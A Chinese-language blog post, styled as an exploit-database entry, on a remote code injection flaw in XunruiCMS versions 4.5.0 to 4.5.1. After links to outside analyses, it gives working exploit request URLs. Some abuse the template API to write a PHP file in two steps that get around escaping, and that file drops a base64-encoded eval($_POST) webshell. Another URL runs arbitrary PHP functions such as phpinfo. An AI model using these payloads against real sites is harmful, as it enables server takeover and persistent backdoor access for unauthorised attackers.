Featured image of post 迅睿CMS v4.5.0到v4.5.1前台代码注入漏洞
Expliot-Db

迅睿CMS v4.5.0到v4.5.1前台代码注入漏洞

触发条件

一个条件:

1.迅睿CMS 版本为v4.5.0到v4.5.1

漏洞分析

https://xz.aliyun.com/t/10002

http://w4nder.top/index.php/2021/09/18/xunruicms-rce/

Internet Archive’s Wayback Machine:

1

https://web.archive.org/web/*/https://xz.aliyun.com/t/10002

1

https://web.archive.org/web/*/http://w4nder.top/index.php/2021/09/18/xunruicms-rce/

google快照:

1

https://webcache.googleusercontent.com/search?q=cache:6jYLBLzNYZIJ:https://xz.aliyun.com/t/10002+&cd=1&hl=en&ct=clnk&lr=lang_en|lang_ru|lang_ko|lang_zh-CN|lang_zh-TW|lang_ja

1

http://webcache.googleusercontent.com/search?q=cache:7JueN0ys3V0J:w4nder.top/index.php/2021/09/18/xunruicms-rce/+&cd=1&hl=en&ct=clnk&lr=lang_en|lang_ru|lang_ko|lang_zh-CN|lang_zh-TW|lang_ja

bing快照:

只有xz的,没有w4nder的

1

http://cncc.bingj.com/cache.aspx?q=https%3a%2f%2fxz.aliyun.com%2ft%2f10002&d=4793325569704282&mkt=zh-CN&setlang=en-US&w=eZ59zs2SxfyDwKSkJpRp0MonVvsThxnm

一个利用方式

写webshell文件:

写入的文件默认是在网站根目录下

经过测试,如果写入的内容包含<?,会被url转义,但是先写<再写?就不会被转义

写入php标记为<?='';?>的php文件:

1.先写<:

1

/index.php?s=api&c=api&m=template&app=admin&name=api_related.html&phpcmf_dir=admin&mid=%20action=function%20name=file_put_contents%20param0=webshell2.php%20param1=<

2.写剩余的语句:

1

/index.php?s=api&c=api&m=template&app=admin&name=api_related.html&phpcmf_dir=admin&mid=%20action=function%20name=file_put_contents%20param0=webshell2.php%20param1=?='';file_put_contents('webshell.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWyd3ZWJzaGVsbCddKTs/Pg=='));%20param2=FILE_APPEND

写入php标记为<?php ?>的php文件

1.先写<:

1

/index.php?s=api&c=api&m=template&app=admin&name=api_related.html&phpcmf_dir=admin&mid=%20action=function%20name=file_put_contents%20param0=webshell2.php%20param1=<

2.写剩余的语句:

1

/index.php?s=api&c=api&m=template&app=admin&name=api_related.html&phpcmf_dir=admin&mid=%20action=function%20name=file_put_contents%20param0=webshell2.php%20param1=?php%0dfile_put_contents('webshell.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWyd3ZWJzaGVsbCddKTs/Pg=='));%20param2=FILE_APPEND

写完之后,访问webshell2.php,会在同目录下生成webshell.php文件,webshell.php即为webshell

执行无参函数

如果想执行无参函数,例如phpinfo();,将url中的param0参数设为-1即可:

1

/index.php?s=api&c=api&m=template&app=admin&name=api_related.html&phpcmf_dir=admin&mid=%20action=function%20name=phpinfo%20param0=-1
© 2022 - 2024 Weltolk
2u94 4 4un
Built with Hugo
Theme Stack designed by Jimmy